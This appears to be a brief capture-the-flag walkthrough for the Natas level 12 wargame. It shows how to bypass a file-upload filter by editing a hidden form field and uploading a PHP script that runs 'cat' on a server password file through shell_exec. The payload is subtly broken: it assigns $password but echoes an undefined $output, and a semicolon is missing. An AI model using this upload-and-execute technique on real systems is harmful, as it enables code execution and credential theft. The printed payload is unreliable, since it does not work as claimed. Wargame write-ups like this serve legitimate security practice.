Natas Level 12
28 Sep 2015 • NateStep 1: Write the “payload script”
Create a php file to display the natas13 password
1
2
3
4
<?php
$password = shell_exec("cat /etc/natas_webpass/natas13");
echo "<pre>$output</pre>"
?>
Step 2: Modify the hidden input field
Open up your browser’s javascript console. In Chrome, CTRL+SHIFT+I will open up the Developer Tools. Change the value of the hidden input field “filename” so that it displays a php file extension instead of jpg.
1
$( 'input[name="filename"]').val("test.php")
Make sure to hit enter so the code above is executed in your browser.
Stage 3: Upload the payload and browse to it
Upload your php file, and click on the link to your file so the webserver executes the script you wrote. The data displayed is the password for natas13.